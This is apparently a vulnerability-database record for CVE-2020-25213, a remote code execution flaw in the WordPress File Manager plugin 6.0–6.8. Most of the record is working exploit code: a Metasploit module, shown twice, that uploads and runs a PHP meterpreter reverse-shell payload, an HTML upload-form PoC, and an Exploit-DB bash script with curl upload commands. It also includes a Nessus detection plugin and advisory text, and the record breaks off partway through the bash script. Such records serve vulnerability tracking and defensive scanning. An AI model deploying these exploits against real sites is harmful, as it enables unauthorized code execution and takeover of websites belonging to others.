"modified": "2020-11-10T00:00:00", "id": "PACKETSTORM:160003", "href": "https://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HTTP::Wordpress \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe 
File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and \nexecute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php \nextension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write \nPHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alex Souza (w4fz5uck5)', # initial discovery and PoC \n'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module \n], \n'References' => \n[ \n[ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], \n[ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], \n[ 'CVE', '2020-25213' ] \n], \n'Platform' => [ 'php' ], \n'Privileged' => false, \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ \n'WordPress File Manager 6.0-6.8', \n{ \n'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 \n'DefaultTarget' => 0 \n) \n) \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), \nOptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) \n] \n) \nend \n \ndef check \nreturn CheckCode::Unknown unless wordpress_and_online? 
\n \n# check the plugin version from readme \ncheck_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') \nend \n \ndef exploit \n# base path to File Manager plugin \nfile_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') \n# filename of the file to be uploaded/created \nfilename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\" \nregister_file_for_cleanup(filename) \n \ncase datastore['COMMAND'] \nwhen 'upload' \nelfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) \nwhen 'mkfile+put' \nelfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) \nelfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) \nend \n \npayload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) \nprint_status(\"#{peer} - Payload is at #{payload_uri}\") \n# execute the payload \nsend_request_cgi('uri' => normalize_uri(payload_uri)) \nend \n \n# make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods \ndef elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) \nfilename = opts['filename'] \n \n# prep for exploit \npost_data = Rex::MIME::Message.new \npost_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"') \n \ncase elfinder_cmd \nwhen 'upload' \npost_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\") \nwhen 'mkfile' \npost_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(filename, nil, nil, 'form-data; name=\"name\"') \nwhen 'put' \npost_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"') \npost_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"') \nend \n \nres = send_request_cgi( \n'uri' => normalize_uri(file_manager_base_uri, 'lib', 
'php', 'connector.minimal.php'), \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => post_data.to_s \n) \n \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res \nfail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200 \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160003/wp_file_manager_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-10-27T22:48:31", "description": "The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n", "cvss3": {}, "published": "2020-10-10T17:20:28", "type": "metasploit", "title": "WordPress File Manager Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-HTTP-WP_FILE_MANAGER_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/wp_file_manager_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\n 'Description' => %q{\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows 
remote attackers to upload and\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\n ],\n 'References' => [\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\n [ 'CVE', '2020-25213' ]\n ],\n 'Platform' => [ 'php' ],\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [\n 'WordPress File Manager 6.0-6.8',\n {\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\n ]\n )\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n # check the plugin version from readme\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\n end\n\n def exploit\n # base path to File Manager plugin\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\n # filename of the file to be uploaded/created\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\n register_file_for_cleanup(filename)\n\n case datastore['COMMAND']\n when 'upload'\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\n when 'mkfile+put'\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\n 
elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\n end\n\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\n # execute the payload\n send_request_cgi('uri' => normalize_uri(payload_uri))\n end\n\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\n filename = opts['filename']\n\n # prep for exploit\n post_data = Rex::MIME::Message.new\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\n\n case elfinder_cmd\n when 'upload'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\n when 'mkfile'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\n when 'put'\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\n end\n\n res = send_request_cgi(\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n )\n\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_file_manager_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:21:15", "description": "Seravo noticed multiple cases where WordPress sites were 
breached using a 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available on wordpress.org). By default, the file lib/php/connector.minimal.php can be opened directly, and this file loads lib/php/elFinderConnector.class.php, which reads POST/GET variables and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution. It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\n", "cvss3": {}, "published": "2020-09-01T00:00:00", "type": "wpexploit", "title": "File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2020-12-02T14:48:23", "id": "WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9", "href": "", "sourceData": "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py\r\n\r\n<html>\r\n<body>\r\n <form method=\"POST\" enctype=\"multipart/form-data\" action=\"https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"upload\"/>\r\n <input type=\"hidden\" name=\"target\" value=\"l1_Lw\"/>\r\n <input type=\"file\" name=\"upload[]\"/><br/><br/>\r\n <input type=\"submit\" value=\"Upload\"/>\r\n </form>\r\n</body>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in WordPress File Manager plugin\n\nVulnerability Type: File Upload", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-13T00:00:00", "type": "dsquare", "title": "WordPress File Manager < 6.9 File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2021-03-13T00:00:00", "id": "E-722", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:20:11", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. 
An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-04T00:00:00", "type": "nessus", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0115\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"WordPress File Manager < 6.9 File Upload\");\n 
script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T04:09:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Wp-FileManager 6.8 - RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-25213", "CVE-2020-25213"], "modified": "2020-12-02T00:00:00", "id": "EDB-ID:49178", "href": "https://www.exploit-db.com/exploits/49178", "sourceData": "# Exploit Title: WordPress Plugin 
Wp-FileManager 6.8 - RCE\r\n# Date: September 4,2020\r\n# Exploit Author: Mansoor R (@time4ster)\r\n# CVE: CVE-2020-25213\r\n# Version Affected: 6.0 to 6.8\r\n# Vendor URL: https://wordpress.org/plugins/wp-file-manager/\r\n# Patch: Upgrade to wp-file-manager 6.9 (or above)\r\n# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04\r\n\r\n#!/bin/bash\r\n\r\n#Description:\r\n#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library\u2019s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used \u201cas-is\u201d without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file\r\n\r\n#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.\r\n\r\n\r\n#Patch commit details:\r\n# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=\r\n\r\n#Reference\r\n#https://nvd.nist.gov/vuln/detail/CVE-2020-25213\r\n\r\n#Credits:\r\n#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\r\n#2. 
https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/\r\n\r\n##WARNINGS: \r\n#Only test the exploit on websites you are authorized to.\r\n#Don't upload reverse shell payloads or any files that can cause harm to organization.\r\n#Also note that the uploaded files can be accessed by anyone unless secured by password.\r\n\r\n## Usage:\r\n# ========\r\n# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check\r\n# \r\n# ============================================================================================\r\n# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]\r\n# \r\n# By: Mansoor R (@time4ster)\r\n# ============================================================================================\r\n# \r\n# [+] Found wp-file-manager version: 6.0\r\n# [+] Version appears to be vulnerable\r\n# [+] Target: http://192.168.1.54/wordpress is vulnerable\r\n# \r\n# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose\r\n# \r\n# ============================================================================================\r\n# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]\r\n# \r\n# By: Mansoor R (@time4ster)\r\n# ============================================================================================\r\n# \r\n# curl POC :\r\n# curl -ks --max-time 5 --user-agent \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@//tmp/mypoc.php\" \"http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\n# \r\n# [+] W00t! W00t! 
File uploaded successfully.\r\n# Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php\r\n\r\n# Exploit\r\n#==========\r\necho\r\necho \"============================================================================================\"\r\necho \"wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]\"\r\necho\r\necho \"By: Mansoor R (@time4ster)\"\r\necho \"============================================================================================\"\r\necho\r\n\r\nfunction printHelp()\r\n{\r\n\techo -e \"\r\nUsage:\r\n\r\n-u|--wp_url <string>\t\tWordpress target url\r\n-f|--upload_file <string>\t\tAbsolute location of local file to upload on the target. (relative path will not work)\r\n-k|--check\t\t\t\tOnly checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.\r\n-v|--verbose\t\t\t\tAlso prints curl command which is going to be executed\r\n-h|--help\t\t\t\tPrint Help menu\r\n\r\n\r\nExample:\r\n./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check\r\n./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose\r\n\"\r\n}\r\n\r\ncheck=\"false\"\r\nverbose=\"false\"\r\n#Processing arguments\r\nwhile [[ \"$#\" -gt 0 ]]\r\ndo\r\nkey=\"$1\"\r\n\r\ncase \"$key\" in\r\n -u|--wp_url)\r\n\t wp_url=\"$2\"\r\n\t shift\r\n\t shift # past argument\r\n\t ;;\r\n -f|--upload_file)\r\n\t upload_file=\"$2\"\r\n\t shift\r\n\t shift\r\n\t ;;\r\n -k|--check)\r\n\t check=\"true\"\r\n\t shift\r\n\t shift\r\n\t ;;\r\n -v|--verbose)\r\n\t verbose=\"true\"\r\n\t shift\r\n\t ;;\r\n -h|--help)\r\n\t printHelp\r\n\t exit\r\n\t shift\r\n\t ;;\r\n *) \r\n\t echo [-] Enter valid options\r\n\t exit\r\n\t ;;\r\nesac\r\ndone\r\n\r\n[[ -z \"$wp_url\" ]] && echo \"[-] Supply wordpress target URL.\" && exit \r\n[[ -z \"$upload_file\" ]] && [[ \"$check\" == \"false\" ]] && echo \"[-] Either supply --upload_file or --check\" && 
exit\r\n[[ -n \"$upload_file\" ]] && [[ ! -s \"$upload_file\" ]] && echo \"[-] File supplied is either empty or not exist.\" && exit\r\n\r\n#Script have dependency on jq\r\njq_cmd=$(command -v jq)\r\n[[ -z \"$jq_cmd\" ]] && echo -e \"[-] Script have dependency on jq. Insall jq from your package manager.\\nFor debian based distro install using command: apt install jq\" && exit\r\n\r\nfunction checkWPFileManagerVersion()\r\n{\t\t\t\t\t\t\t\t\t\t#Takes 1 argument: url\r\n\tdeclare url=\"$1\"\r\n\tdeclare target_endpoint=\"$url/wp-content/plugins/wp-file-manager/readme.txt\"\r\n\tdeclare user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\"\r\n\tdeclare is_vulnerable=\"true\"\r\n\t#declare response=$(curl -ks --max-time 5 --user-agent \"$user_agent\" \"$target_endpoint\" | grep -i \"Stable tag: \")\r\n\tdeclare version=$( curl -ks --max-time 5 --user-agent \"$user_agent\" \"$target_endpoint\" | grep -A 5 \"== Changelog ==\" | grep -E -o \"[0-9]\\.[0-9]\" | head -n 1 )\r\n\tif [ -n \"$version\" ];then\r\n\t\t#declare version=$(echo \"$response\" | awk {'print $3'})\r\n\t\techo \"[+] Found wp-file-manager version: $version\"\r\n\t\t\r\n\t\tpatched_version=\"6.9\"\r\n\t\t#if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then\r\n\t\tsmaller_version=$(echo -e \"$version\\n$patched_version\" | sort -n | head -n 1)\r\n\t\tif [ \"$version\" != \"$patched_version\" ] && [ \"$smaller_version\" == \"$version\" ];then\r\n\t\t\techo \"[+] Version appears to be vulnerable\"\r\n\t\telse\r\n\t\t\techo \"[-] Version don't appears to be vulnerable\"\r\n\t\t\tis_vulnerable=false\r\n\t\tfi\r\n\telse\techo \"[-] Unable to detect version. 
May be wp-file-manager plugin not installed.\"\r\n\t\tis_vulnerable=false\r\n\tfi\r\n\tif [ \"$is_vulnerable\" == \"false\" ];\r\n\tthen\r\n\t\techo -n \"Do you still want to continue (y/N) : \"\r\n\t\tread choice\r\n\t\t[[ \"$choice\" == \"y\" ]] || [[ \"$choice\" == \"Y\" ]] && echo && return\r\n\t\texit\t\r\n\tfi\r\n\r\n\r\n}\r\n\r\nfunction checkWPFileManager()\r\n{\t\t\t\t\t\t\t\t\t\t#Takes 1 argument: url\r\n\tdeclare url=\"$1\"\r\n\r\n\t#Checking wp-file-manager plugin version:\r\n\tcheckWPFileManagerVersion \"$url\"\r\n\r\n\tdeclare target_endpoint=\"$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\n\tdeclare user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\"\r\n\t\r\n\tdeclare response=$(curl -ks --max-time 5 --user-agent \"$user_agent\" \"$target_endpoint\")\r\n\t#echo \"$response\"\r\n\t#{\"error\":[\"errUnknownCmd\"]} is returned when vulnerable endpoint is hit\r\n\tdeclare is_vulnerable=$(echo \"$response\" | grep \"\\{\\\"error\\\":\\[\\\"errUnknownCmd\\\"\\]\\}\")\r\n\t[[ -n \"$is_vulnerable\" ]] && echo \"[+] Target: $url is vulnerable\"\r\n\t[[ -z \"$is_vulnerable\" ]] && echo \"[-] Target: $url is not vulnerable\"\t\r\n}\r\n\r\nfunction exploitWPFileManager()\r\n{\t\t\t\t\t\t\t\t\t\t#Takes 3 arguments: url & file_upload & verbose(true/false)\r\n\tdeclare url=\"$1\"\r\n\tdeclare file_upload=\"$2\"\r\n\tdeclare verbose=\"$3\"\r\n\tdeclare target_endpoint=\"$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\n\tdeclare user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\"\r\n\r\n\tif [ \"$verbose\" == \"true\" ];then\r\n\t\techo \"curl POC :\"\r\n\t\techo \"curl -ks --max-time 5 --user-agent \\\"$user_agent\\\" -F \\\"reqid=17457a1fe6959\\\" -F \\\"cmd=upload\\\" -F \\\"target=l1_Lw\\\" -F \\\"mtime[]=1576045135\\\" -F \\\"upload[]=@/$file_upload\\\" 
